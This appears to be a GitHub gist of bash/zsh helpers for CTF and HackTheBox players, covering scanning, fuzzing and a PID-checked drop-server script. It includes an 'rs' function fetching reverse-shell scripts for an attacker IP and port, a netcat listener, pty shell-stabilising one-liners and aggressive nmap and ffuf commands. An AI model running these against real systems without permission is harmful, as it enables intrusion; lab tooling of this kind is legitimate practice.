
@kavishkagihan
Last active February 16, 2023 18:03
Useful aliases for CTF players #aliases #bash #zsh #linux #CTF #Hackthebox
  • List files with more detail - ll
alias ll='ls -alhF'
  • First, install xclip on your system. This lets you pipe the output of a command straight to your clipboard - cat file.txt|c
alias c='xclip -selection clipboard'
  • Change the prompt of your shell. Helps you label and recognize your terminal windows. You can change the colors to your preference - p dev01>
p() {
	# zsh prompt escapes: %B bold, %F{...} foreground colour; $reset_color is provided by oh-my-zsh
	PS1="%B%F{green}➜  %B%F{#03fcd0}$1 %{$reset_color%}"
}
  • Start a Python HTTP server - server 8081. To serve a specific directory, pass it as the second argument - server 9090 /tmp/
server() {
	if [[ -n $2 ]]; then
		python3 -m http.server "$1" --directory "$2"
	else
		python3 -m http.server "$1"
	fi
}
  • Generate a script with reverse shells to use - rs 10.10.14.28 9001 > shell.sh
rs() {
	curl "https://reverse-shell.sh/$1:$2"
}
  • Connect to a VPN - vpn-up
vpn-up() {
	sudo pkill openvpn
	sudo openvpn /home/kavi/Documents/HTB/lab_kavigihan.ovpn
}
  • Set up the environment (for HTB players). This creates a directory named after the box you specify and starts a web server in the /opt/drop directory, where you can put files like pspy or linpeas.sh. The PID of the server is saved in /home/kavi/Documents/HTB/$1/.server.pid in case you want to kill the server - htb-init Moderators
htb-init() {
	if [[ -n $1 ]]; then
		mkdir -p "/home/kavi/Documents/HTB/$1/files"
		mkdir -p "/home/kavi/Documents/HTB/$1/exploits"
		# serve /opt/drop in the background and remember the PID so the server can be killed later
		/usr/bin/python3 -m http.server 8080 --directory /opt/drop > /dev/null 2>&1 &
		echo $! > "/home/kavi/Documents/HTB/$1/.server.pid"
		cd "/home/kavi/Documents/HTB/$1" || return
		clear
	else
		echo 'Usage: htb-init Moderators'
	fi
}
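A companion to htb-init for tearing the drop server down again, added here as an example and not part of the gist. Before killing the PID from .server.pid it checks that the process is still alive and that its command line is still an http.server, so a stale pid file cannot kill an unrelated process that has since reused the same PID. It assumes Linux (/proc) and uses HTB_DIR as a stand-in for the author's hard-coded /home/kavi/Documents/HTB path.

```shell
# Added example (not from the gist). HTB_DIR is an assumption standing in for
# the author's /home/kavi/Documents/HTB; override it in your shell if needed.
HTB_DIR="${HTB_DIR:-$HOME/Documents/HTB}"

# drop_start BOX [PORT] [DIR]: start the drop server in the background and
# record its PID the same way htb-init does (default port 8080, dir /opt/drop).
drop_start() {
    local box=$1 port=${2:-8080} dir=${3:-/opt/drop}
    mkdir -p "$HTB_DIR/$box"
    python3 -m http.server "$port" --directory "$dir" >/dev/null 2>&1 &
    echo "$!" > "$HTB_DIR/$box/.server.pid"
}

# pid_matches PIDFILE PATTERN: succeed only if PIDFILE holds a live PID whose
# command line matches PATTERN (an extended regex). This is the check that
# protects against PID reuse after the original server has already exited.
pid_matches() {
    local pidfile=$1 pattern=$2 pid
    [ -r "$pidfile" ] || return 1
    pid=$(cat "$pidfile")
    case $pid in
        ''|*[!0-9]*) return 1 ;;               # not a plain positive integer
    esac
    kill -0 "$pid" 2>/dev/null || return 1     # process must still exist
    # /proc/<pid>/cmdline is NUL-separated; turn the NULs into spaces first
    tr '\000' ' ' < "/proc/$pid/cmdline" 2>/dev/null | grep -Eq -- "$pattern"
}

# drop_stop BOX: kill the recorded server only if the PID still belongs to an
# http.server; otherwise report it and just discard the stale pid file.
drop_stop() {
    local pidfile="$HTB_DIR/$1/.server.pid"
    if pid_matches "$pidfile" 'http\.server'; then
        kill "$(cat "$pidfile")" && rm -f "$pidfile"
    else
        echo "no live http.server recorded in $pidfile (stale or missing)" >&2
        rm -f "$pidfile"
        return 1
    fi
}
```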
  • Run a full nmap scan - nmap-full 10.10.11.169
nmap-full() {
	nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -vv "$1"
}
  • Run ffuf for directory busting - ffuf-dir http://site.com/FUZZ. If you want to specify extensions or any other option, pass them after the URL (ffuf-dir URL -e php -fl 100)
ffuf-dir() {
	ffuf -u "$1" -w /usr/share/wordlists/dirb/big.txt "${@:2}"
}
  • Run ffuf for vhost fuzzing - ffuf-vhost domain.local
ffuf-vhost() {
	ffuf -H "Host: FUZZ.$1" -u "http://$1" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt "${@:2}"
}
  • Start feroxbuster for directory brute-forcing - fx http://10.10.11.169. Extra options can be passed after the URL, as with ffuf-dir
fx() {
	feroxbuster -u "$1" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt "${@:2}"
}
  • Start a listener. This is specifically for zsh users (especially oh-my-zsh). By default this starts the listener on port 9090, or you can specify the port you need - lst 9001
lst() {
	if [[ -n $1 ]]; then
		bash --login -c "nc -lvnp $1"
	else
		bash --login -c "nc -lvnp 9090"
	fi
}
  • Stabilize the shell. This can be used in combination with the above listener - st 1 copies the python variant, st 2 the python3 variant and plain st the script variant.
st() {
	# uses the c alias from above, so it must be defined before this function is sourced
	if [[ $1 == 1 ]]; then
		printf "python -c 'import pty;pty.spawn(\"/bin/bash\")'\nexport TERM=alacritty\n" | c
	elif [[ $1 == 2 ]]; then
		printf "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nexport TERM=alacritty\n" | c
	else
		printf 'script -q /dev/null -c /bin/bash\nexport TERM=alacritty\n' | c
	fi
	echo "Stabilizing commands copied to the clipboard!"
	stty raw -echo; fg
}

I.e. once you get a connection to your listener, you can background it with Ctrl+z and then issue st to copy the stabilizing commands to your clipboard (the c alias mentioned above is used here as well). The function then issues the stty raw -echo;fg command for you. Then you just have to paste the copied commands and press enter, and you have a fully stabilized shell!

Another nice automated solution for stabilizing your reverse shell which works for both bash and zsh can be found here

  • Url encode a string - echo asd==|urlencode
urlencode() {
        python3 -c "import sys; from urllib.parse import quote; print(quote(sys.stdin.read().strip()));"
}
  • URL decode a string - echo 123%3D%3D|urldecode
urldecode() {
        python3 -c "import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read().strip()));"
}
  • Get the MD5 hash of a string - echo kavi|md5
md5() {
	# strip the trailing newline that echo adds so the hash is of the string itself
	python3 -c 'import hashlib,sys; print(hashlib.md5(sys.stdin.read().rstrip("\n").encode()).hexdigest())'
}
  • The following are for tmux users. They let you quickly add notes to the status bar of your tmux session. I.e. when you find a user password that you will be using a lot, you can add it here instead of keeping it in the clipboard or noting it down in a file. - tsa 'admin:pa$$10rd' - this will add the note. tsd - will clear the status bar
tsa() {
	# prepend the note to the current right-hand status and persist the new state to the file
	status_bar=$(cat "$TMUX_SATUS_BAR")
	tmux set-option -g status-right "$1 $status_bar"
	echo "| $1 $status_bar" > "$TMUX_SATUS_BAR"
}

tsd() {
	# reset the persisted state to just the session name and reapply it
	echo '[#{session_name}]' > "$TMUX_SATUS_BAR"
	status_bar=$(cat "$TMUX_SATUS_BAR")
	tmux set-option -g status-right "$status_bar"
}

NOTE: For this to work you need a variable called TMUX_SATUS_BAR pointing to a file that contains the current config for the right side of your status bar. For me it's [#{session_name}]. For more information, take a look at my .zshrc

@kavishkagihan

If you have any other suggestions, let me know!
